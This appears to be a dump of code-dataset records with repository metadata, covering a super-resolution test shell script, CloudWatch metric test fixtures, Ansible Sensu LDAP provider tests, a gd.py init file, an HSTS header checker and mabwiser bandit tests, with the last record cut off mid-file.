|
2019-05-28T03:17:07.000Z
|
2019-09-24T08:18:13.000Z
|
tools/paper_test.py
|
huaer9258/SRDN
|
e5cfec029942088523550cc62f47e6f6519a6474
|
[
"MIT"
] | null | null | null |
tools/paper_test.py
|
huaer9258/SRDN
|
e5cfec029942088523550cc62f47e6f6519a6474
|
[
"MIT"
] | null | null | null |
# Super-resolve the Set14 "comic" image (img_005, SRF 4) with every saved
# checkpoint of two model families, writing one PNG per checkpoint.
#
# This file originally listed all 126 invocations by hand; the two loops
# below emit the identical command sequence.

# Shared low-resolution input image and output directory.
IMG=/mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png
OUT_DIR=./paper_test_img

# DenseNet+FFT checkpoints 1..63.
for i in $(seq 1 63); do
    th test_origin.lua -img "$IMG" \
        -output "$OUT_DIR/comic${i}_densenetfft.png" \
        -model "./paper_test/densenet_fft_${i}.t7"
done

# Plain DenseNet checkpoints 1..63 (note the trailing underscore in the
# output name, kept from the original file for downstream compatibility).
for i in $(seq 1 63); do
    th test_origin.lua -img "$IMG" \
        -output "$OUT_DIR/comic${i}_densenet_.png" \
        -model "./checkpoint_densenet_final/test4_${i}.t7"
done
| 182.403101
| 189
| 0.833829
| 4,284
| 23,530
| 4.182773
| 0.035481
| 0.056253
| 0.08438
| 0.105475
| 0.999665
| 0.999665
| 0.999665
| 0.707852
| 0.707852
| 0.707852
| 0
| 0.069119
| 0.053719
| 23,530
| 128
| 190
| 183.828125
| 0.735651
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
080c4326521d6493c51de6ab224a7a632c326f61
| 8,575
|
py
|
Python
|
test/integration/events.py
|
awslabs/aws-serverless-metrics-publisher
|
1a0a2d444ae634d0b0e4314a2ee9b748f1aad9ea
|
[
"MIT-0"
] | 10
|
2018-08-02T19:27:59.000Z
|
2021-07-12T18:39:01.000Z
|
test/integration/events.py
|
awslabs/aws-serverless-metrics-publisher
|
1a0a2d444ae634d0b0e4314a2ee9b748f1aad9ea
|
[
"MIT-0"
] | 1
|
2020-02-19T15:15:43.000Z
|
2020-02-20T12:47:53.000Z
|
test/integration/events.py
|
awslabs/aws-serverless-metrics-publisher
|
1a0a2d444ae634d0b0e4314a2ee9b748f1aad9ea
|
[
"MIT-0"
] | 7
|
2018-10-04T04:33:28.000Z
|
2021-09-02T17:50:25.000Z
|
"""Collection of events for integration tests."""
import pytest
import uuid
import time
@pytest.fixture()
def input_events():
    """Return five metric-publisher input payloads covering the API surface.

    input_1: one data point with a plain value.
    input_2: two data points under a single request.
    input_3: one data point carrying statistic_values instead of a value.
    input_4: 20 identical points in one request.
    input_5: 10 identical points in one request.
    """

    def _request_id():
        # Fresh UUID per event so repeated test runs never collide.
        return "request_id_" + str(uuid.uuid4())

    def _point(metric_name, **payload):
        # One metric datum; *payload* supplies either value=... or
        # statistic_values=... on top of the shared skeleton.
        point = {
            "metric_name": metric_name,
            "dimensions": [
                {
                    "name": "test_name",
                    "value": "test_value"
                }
            ],
            "timestamp": time.time(),
        }
        point.update(payload)
        return point

    input_1 = {
        "request_id": _request_id(),
        "metric_data": [_point("theMetricName1", value=50)],
    }
    input_2 = {
        "request_id": _request_id(),
        "metric_data": [
            _point("theMetricName2", value=25),
            _point("theMetricName2", value=35),
        ],
    }
    input_3 = {
        "request_id": _request_id(),
        "metric_data": [
            _point(
                "theMetricName3",
                statistic_values={
                    "sample_count": 5,
                    "sum": 217,
                    "minimum": 1,
                    "maximum": 555,
                },
            )
        ],
    }
    input_4 = {
        "request_id": _request_id(),
        "metric_data": [_point("theMetricName4", value=42) for _ in range(20)],
    }
    input_5 = {
        "request_id": _request_id(),
        "metric_data": [_point("theMetricName4", value=39) for _ in range(10)],
    }
    return [input_1, input_2, input_3, input_4, input_5]
@pytest.fixture()
def sample_queries():
    """Return the CloudWatch GetMetricData queries matching input_events.

    All queries share the same namespace and dimensions; only the query
    id, metric name, statistic, and period vary.
    """

    def _query(query_id, metric_name, stat, period=1):
        # One MetricDataQuery entry in the shape the CloudWatch
        # GetMetricData API expects.
        return {
            'Id': query_id,
            'MetricStat': {
                'Metric': {
                    'Namespace': 'metricPublisherAppNamespace',
                    'MetricName': metric_name,
                    'Dimensions': [
                        {
                            'Name': 'test_name',
                            'Value': 'test_value'
                        }
                    ]
                },
                'Period': period,
                'Stat': stat
            }
        }

    return [
        _query('id_1', 'theMetricName1', 'Average'),
        _query('id_2', 'theMetricName2', 'Average'),
        _query('id_3', 'theMetricName2', 'Sum'),
        _query('id_4', 'theMetricName3', 'SampleCount'),
        _query('id_5', 'theMetricName3', 'Sum'),
        _query('id_6', 'theMetricName3', 'Minimum'),
        _query('id_7', 'theMetricName3', 'Maximum'),
        _query('id_8', 'theMetricName3', 'Average'),
        _query('id_9', 'theMetricName4', 'SampleCount', period=5),
        _query('id_10', 'theMetricName4', 'Average', period=5),
    ]
| 29.166667
| 63
| 0.313936
| 460
| 8,575
| 5.608696
| 0.154348
| 0.069767
| 0.111628
| 0.136434
| 0.879457
| 0.855426
| 0.832946
| 0.832946
| 0.749225
| 0.749225
| 0
| 0.020125
| 0.571195
| 8,575
| 293
| 64
| 29.266212
| 0.681534
| 0.005015
| 0
| 0.513793
| 0
| 0
| 0.238447
| 0.031668
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006897
| false
| 0
| 0.010345
| 0.003448
| 0.024138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b9e1c463e1cae9ca28e1415a047e6563fbc4086
| 10,619
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/sensu/sensu_go/tests/unit/plugins/modules/test_ldap_auth_provider.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/sensu/sensu_go/tests/unit/plugins/modules/test_ldap_auth_provider.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/sensu/sensu_go/tests/unit/plugins/modules/test_ldap_auth_provider.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import sys
import pytest
from ansible_collections.sensu.sensu_go.plugins.module_utils import (
errors,
utils,
)
from ansible_collections.sensu.sensu_go.plugins.modules import ldap_auth_provider
from .common.utils import (
AnsibleExitJson,
AnsibleFailJson,
ModuleTestCase,
set_module_args,
)
# Skip every test in this module when running on an interpreter older
# than Python 2.7.
pytestmark = pytest.mark.skipif(
    sys.version_info < (2, 7), reason="requires python2.7 or higher"
)
class TestDoDiffer:
    """Unit tests for ldap_auth_provider.do_differ.

    Each test compares a *desired* object (what the module wants) with a
    *current* object (what the backend reports; it additionally carries
    the read-only metadata field created_by).
    """

    @staticmethod
    def _server(host="127.0.0.1", **overrides):
        # One LDAP server entry; extra keyword args (e.g. port=636) are
        # merged on top of the defaults.
        server = dict(
            host=host,
            group_search=dict(
                base_dn="dc=acme,dc=org",
            ),
            user_search=dict(
                base_dn="dc=acme,dc=org",
            ),
        )
        server.update(overrides)
        return server

    @staticmethod
    def _desired(**spec):
        # Desired state as produced from module parameters.
        return dict(
            spec=dict(**spec),
            metadata=dict(name="openldap"),
        )

    @classmethod
    def _current(cls, **spec):
        # Remote state; defaults to a single stock server and always
        # includes the backend-added created_by metadata.
        spec.setdefault("servers", [cls._server()])
        return dict(
            spec=dict(**spec),
            metadata=dict(
                name="openldap",
                created_by="me",
            ),
        )

    def test_no_changes(self):
        # Identical specs (created_by alone must be ignored).
        desired = self._desired(servers=[self._server()])
        current = self._current()
        assert ldap_auth_provider.do_differ(current, desired) is False

    def test_changes_are_detected(self):
        # A changed field inside a server entry must be detected.
        desired = self._desired(servers=[self._server(port=636)])
        current = self._current()
        assert ldap_auth_provider.do_differ(current, desired) is True

    def test_changes_are_detected_diff_servers_len(self):
        # A different number of server entries must be detected.
        desired = self._desired(
            servers=[self._server(), self._server(host="127.0.0.2")],
        )
        current = self._current()
        assert ldap_auth_provider.do_differ(current, desired) is True

    def test_changes_are_other_params(self):
        # Top-level spec fields outside servers must be detected.
        desired = self._desired(
            servers=[],
            groups_prefix="ldap",
            username_prefix="ldap",
        )
        current = self._current(servers=[])
        assert ldap_auth_provider.do_differ(current, desired) is True
class TestLDAPAutProvider(ModuleTestCase):
    """Tests for ldap_auth_provider.main(): argument handling and payload shape."""
    # NOTE(review): class name is likely missing an "h" (LDAPAut vs LDAPAuth);
    # left unchanged so test selection by name keeps working.
    def test_minimal_provider_parameters(self, mocker):
        """Minimal module args are expanded into a fully-defaulted API payload."""
        sync_v1_mock = mocker.patch.object(utils, "sync_v1")
        sync_v1_mock.return_value = True, {}
        set_module_args(
            state="present",
            name="openldap",
            servers=[
                dict(
                    host="127.0.0.1",
                    group_search=dict(
                        base_dn="dc=acme,dc=org",
                    ),
                    user_search=dict(
                        base_dn="dc=acme,dc=org",
                    ),
                )
            ],
        )
        # main() terminates via exit_json, which the test harness converts
        # into AnsibleExitJson.
        with pytest.raises(AnsibleExitJson):
            ldap_auth_provider.main()
        # Positional args passed to utils.sync_v1 by main().
        state, _client, path, payload, check_mode, _do_differ = sync_v1_mock.call_args[
            0
        ]
        assert state == "present"
        assert path == "/api/enterprise/authentication/v2/authproviders/openldap"
        # Unspecified optional server fields must be present with their defaults.
        assert payload == dict(
            type="ldap",
            api_version="authentication/v2",
            metadata=dict(name="openldap"),
            spec=dict(
                servers=[
                    dict(
                        host="127.0.0.1",
                        port=None,
                        insecure=False,
                        security="tls",
                        trusted_ca_file=None,
                        client_cert_file=None,
                        client_key_file=None,
                        binding=None,
                        group_search=dict(
                            base_dn="dc=acme,dc=org",
                            attribute="member",
                            name_attribute="cn",
                            object_class="groupOfNames",
                        ),
                        user_search=dict(
                            base_dn="dc=acme,dc=org",
                            attribute="uid",
                            name_attribute="cn",
                            object_class="person",
                        ),
                    )
                ]
            ),
        )
        assert check_mode is False
    def test_all_provider_parameters(self, mocker):
        """Fully-specified module args are forwarded to the API unchanged."""
        sync_v1_mock = mocker.patch.object(utils, "sync_v1")
        sync_v1_mock.return_value = True, {}
        set_module_args(
            state="present",
            name="openldap",
            servers=[
                dict(
                    host="127.0.0.1",
                    port=636,
                    insecure=False,
                    security="tls",
                    trusted_ca_file="/path/to/trusted-certificate-authorities.pem",
                    client_cert_file="/path/to/ssl/cert.pem",
                    client_key_file="/path/to/ssl/key.pem",
                    binding=dict(
                        user_dn="cn=binder,dc=acme,dc=org",
                        password="YOUR_PASSWORD",
                    ),
                    group_search=dict(
                        base_dn="dc=acme,dc=org",
                        attribute="member",
                        name_attribute="cn",
                        object_class="groupOfNames",
                    ),
                    user_search=dict(
                        base_dn="dc=acme,dc=org",
                        attribute="uid",
                        name_attribute="cn",
                        object_class="person",
                    ),
                )
            ],
            groups_prefix="ldap",
            username_prefix="ldap",
        )
        with pytest.raises(AnsibleExitJson):
            ldap_auth_provider.main()
        state, _client, path, payload, check_mode, _do_differ = sync_v1_mock.call_args[
            0
        ]
        assert state == "present"
        assert path == "/api/enterprise/authentication/v2/authproviders/openldap"
        assert payload == dict(
            type="ldap",
            api_version="authentication/v2",
            metadata=dict(name="openldap"),
            spec=dict(
                servers=[
                    dict(
                        host="127.0.0.1",
                        port=636,
                        insecure=False,
                        security="tls",
                        trusted_ca_file="/path/to/trusted-certificate-authorities.pem",
                        client_cert_file="/path/to/ssl/cert.pem",
                        client_key_file="/path/to/ssl/key.pem",
                        binding=dict(
                            user_dn="cn=binder,dc=acme,dc=org",
                            password="YOUR_PASSWORD",
                        ),
                        group_search=dict(
                            base_dn="dc=acme,dc=org",
                            attribute="member",
                            name_attribute="cn",
                            object_class="groupOfNames",
                        ),
                        user_search=dict(
                            base_dn="dc=acme,dc=org",
                            attribute="uid",
                            name_attribute="cn",
                            object_class="person",
                        ),
                    )
                ],
                groups_prefix="ldap",
                username_prefix="ldap",
            ),
        )
        assert check_mode is False
    def test_failure(self, mocker):
        """A backend errors.Error from sync_v1 surfaces as a module failure."""
        sync_mock = mocker.patch.object(utils, "sync_v1")
        sync_mock.side_effect = errors.Error("Bad error")
        set_module_args()
        with pytest.raises(AnsibleFailJson):
            ldap_auth_provider.main()
| 32.474006
| 87
| 0.392975
| 859
| 10,619
| 4.639115
| 0.168801
| 0.036136
| 0.048181
| 0.066248
| 0.853701
| 0.842158
| 0.826098
| 0.781681
| 0.772647
| 0.7601
| 0
| 0.018164
| 0.512666
| 10,619
| 326
| 88
| 32.57362
| 0.751884
| 0
| 0
| 0.788779
| 0
| 0
| 0.105566
| 0.02731
| 0
| 0
| 0
| 0
| 0.039604
| 1
| 0.023102
| false
| 0.006601
| 0.019802
| 0
| 0.049505
| 0.0033
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
29fdd34d1bc64917d33052f85418eec4bfa32ad9
| 256
|
py
|
Python
|
gd/api/__init__.py
|
nekitdev/gd.py
|
b9d5e29c09f953f54b9b648fb677e987d9a8e103
|
[
"MIT"
] | 58
|
2020-09-30T16:51:22.000Z
|
2022-02-13T17:27:48.000Z
|
gd/api/__init__.py
|
NeKitDS/gd.py
|
b9d5e29c09f953f54b9b648fb677e987d9a8e103
|
[
"MIT"
] | 30
|
2019-07-29T12:03:41.000Z
|
2020-09-15T17:01:37.000Z
|
gd/api/__init__.py
|
NeKitDS/gd.py
|
b9d5e29c09f953f54b9b648fb677e987d9a8e103
|
[
"MIT"
] | 20
|
2019-12-06T03:16:57.000Z
|
2020-09-16T17:45:27.000Z
|
from gd.api.database import *
from gd.api.editor import *
from gd.api.enums import *
from gd.api.guidelines import *
from gd.api.hsv import *
from gd.api.loader import *
from gd.api.recording import *
from gd.api.struct import *
from gd.api.utils import *
| 25.6
| 31
| 0.753906
| 45
| 256
| 4.288889
| 0.288889
| 0.279793
| 0.419689
| 0.621762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 256
| 9
| 32
| 28.444444
| 0.877273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9a57bb8322585e988cde6f0f871b1c39261023c
| 240
|
py
|
Python
|
securityheaders/checkers/hsts/checker.py
|
th3cyb3rc0p/securityheaders
|
941264be581dc01afe28f6416f2d7bed79aecfb3
|
[
"Apache-2.0"
] | 151
|
2018-07-29T22:34:43.000Z
|
2022-03-22T05:08:27.000Z
|
securityheaders/checkers/hsts/checker.py
|
th3cyb3rc0p/securityheaders
|
941264be581dc01afe28f6416f2d7bed79aecfb3
|
[
"Apache-2.0"
] | 5
|
2019-04-24T07:31:36.000Z
|
2021-04-15T14:31:23.000Z
|
securityheaders/checkers/hsts/checker.py
|
th3cyb3rc0p/securityheaders
|
941264be581dc01afe28f6416f2d7bed79aecfb3
|
[
"Apache-2.0"
] | 42
|
2018-07-31T08:18:59.000Z
|
2022-03-28T08:18:32.000Z
|
from securityheaders.models.hsts import HSTS
from securityheaders.checkers import Checker
class HSTSChecker(Checker):
    """Checker for the HTTP Strict-Transport-Security (HSTS) header."""
    def __init__(self):
        # No per-instance state. NOTE(review): super().__init__() is not
        # called here — confirm the Checker base requires no initialization.
        pass
    def gethsts(self, headers):
        """Return the HSTS header extracted from *headers* via Checker.extractheader."""
        return self.extractheader(headers, HSTS)
| 24
| 50
| 0.733333
| 27
| 240
| 6.37037
| 0.62963
| 0.22093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195833
| 240
| 9
| 51
| 26.666667
| 0.891192
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.142857
| 0.285714
| 0.142857
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
d9d840b321f1a82df14e1559ace374cd63ac7b84
| 80,753
|
py
|
Python
|
tests/test_mab.py
|
vishalbelsare/mabwiser
|
b0785a7b1da5342cc9b68be604f8f42f8a67958e
|
[
"Apache-2.0"
] | 60
|
2020-06-10T11:20:52.000Z
|
2022-03-25T02:16:47.000Z
|
tests/test_mab.py
|
vishalbelsare/mabwiser
|
b0785a7b1da5342cc9b68be604f8f42f8a67958e
|
[
"Apache-2.0"
] | 24
|
2020-06-04T18:40:21.000Z
|
2022-03-24T16:49:51.000Z
|
tests/test_mab.py
|
vishalbelsare/mabwiser
|
b0785a7b1da5342cc9b68be604f8f42f8a67958e
|
[
"Apache-2.0"
] | 12
|
2020-11-30T10:37:05.000Z
|
2022-03-25T02:16:41.000Z
|
# -*- coding: utf-8 -*-
import os
import pickle
from copy import deepcopy
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from mabwiser.mab import MAB, LearningPolicy, NeighborhoodPolicy
from tests.test_base import BaseTest
class MABTest(BaseTest):
#################################################
# Test property decorator methods
################################################
def test_learning_policy_property(self):
for lp in BaseTest.lps:
mab = MAB([1, 2], lp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(lp))
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2], para_lp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(para_lp))
for cp in BaseTest.cps:
for lp in BaseTest.lps:
mab = MAB([1, 2], lp, cp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(lp))
for cp in BaseTest.cps:
for para_lp in BaseTest.lps:
mab = MAB([1, 2], para_lp, cp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(para_lp))
    def test_learning_policy_values(self):
        """Constructor arguments of each learning policy survive the MAB round-trip."""
        lp = LearningPolicy.EpsilonGreedy(epsilon=0.6)
        mab = MAB([0, 1], lp)
        self.assertEqual(lp.epsilon, mab.learning_policy.epsilon)
        data = np.array([[1, 2, 3], [3, 2, 1]])
        sc = StandardScaler()
        sc.fit(data)
        arm_to_scaler = {0: sc, 1: sc}
        lp = LearningPolicy.LinUCB(alpha=2.0, l2_lambda=0.3, arm_to_scaler=arm_to_scaler)
        mab = MAB([0, 1], lp)
        self.assertEqual(lp.alpha, mab.learning_policy.alpha)
        self.assertEqual(lp.l2_lambda, mab.learning_policy.l2_lambda)
        # Scalers must be passed through by reference, not copied.
        self.assertIs(sc, mab.learning_policy.arm_to_scaler[0])
        self.assertIs(sc, mab.learning_policy.arm_to_scaler[1])
        lp = LearningPolicy.Softmax(tau=0.5)
        mab = MAB([0, 1], lp)
        self.assertEqual(lp.tau, mab.learning_policy.tau)
        # Local binarizer used only to build ThompsonSampling below.
        def binary(arm, reward):
            return reward == 1
        lp = LearningPolicy.ThompsonSampling(binarizer=binary)
        mab = MAB([0, 1], lp)
        self.assertIs(lp.binarizer, mab.learning_policy.binarizer)
        lp = LearningPolicy.UCB1(alpha=0.7)
        mab = MAB([0, 1], lp)
        self.assertEqual(lp.alpha, mab.learning_policy.alpha)
def test_neighborhood_policy_property(self):
for cp in BaseTest.cps:
for lp in BaseTest.lps:
mab = MAB([1, 2], lp, cp)
test_np = mab.neighborhood_policy
self.assertTrue(type(test_np) is type(cp))
for cp in BaseTest.cps:
for para_lp in BaseTest.lps:
mab = MAB([1, 2], para_lp, cp)
test_np = mab.neighborhood_policy
self.assertTrue(type(test_np) is type(cp))
def test_neighborhood_policy_values(self):
lp = LearningPolicy.EpsilonGreedy()
np = NeighborhoodPolicy.Clusters(n_clusters=3)
mab = MAB([0, 1], lp, np)
self.assertEqual(np.n_clusters, mab.neighborhood_policy.n_clusters)
self.assertFalse(mab.neighborhood_policy.is_minibatch)
np = NeighborhoodPolicy.Clusters(n_clusters=5, is_minibatch=True)
mab = MAB([0, 1], lp, np)
self.assertEqual(np.n_clusters, mab.neighborhood_policy.n_clusters)
self.assertTrue(mab.neighborhood_policy.is_minibatch)
np = NeighborhoodPolicy.KNearest(k=10, metric='cityblock')
mab = MAB([0, 1], lp, np)
self.assertEqual(np.k, mab.neighborhood_policy.k)
self.assertEqual(np.metric, mab.neighborhood_policy.metric)
np = NeighborhoodPolicy.Radius(radius=1.5, metric='canberra', no_nhood_prob_of_arm=[0.2, 0.8])
mab = MAB([0, 1], lp, np)
self.assertEqual(np.radius, mab.neighborhood_policy.radius)
self.assertEqual(np.metric, mab.neighborhood_policy.metric)
self.assertEqual(np.no_nhood_prob_of_arm, mab.neighborhood_policy.no_nhood_prob_of_arm)
np = NeighborhoodPolicy.LSHNearest(n_dimensions=2, n_tables=2, no_nhood_prob_of_arm=[0.2, 0.8])
mab = MAB([0, 1], lp, np)
self.assertEqual(np.n_dimensions, mab.neighborhood_policy.n_dimensions)
self.assertEqual(np.n_tables, mab.neighborhood_policy.n_tables)
self.assertEqual(np.no_nhood_prob_of_arm, mab.neighborhood_policy.no_nhood_prob_of_arm)
#################################################
# Test context free predict() method
################################################
    def test_arm_list_int(self):
        """predict() accepts integer arm labels (plain and parametric policies)."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_arm_list_str(self):
        """predict() accepts string arm labels (plain and parametric policies)."""
        for lp in MABTest.lps:
            self.predict(arms=["A", "B", "C"],
                         decisions=["A", "A", "A", "B", "B", "B", "C", "C", "C"],
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=["A", "B", "C"],
                         decisions=["A", "A", "A", "B", "B", "B", "C", "C", "C"],
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_decision_series(self):
        """Decisions may be supplied as a pandas Series."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_reward_series(self):
        """Rewards may be supplied as a pandas Series."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_decision_reward_series(self):
        """Both decisions and rewards may be pandas Series."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_decision_array(self):
        """Decisions may be supplied as a numpy array."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_reward_array(self):
        """Rewards may be supplied as a numpy array."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
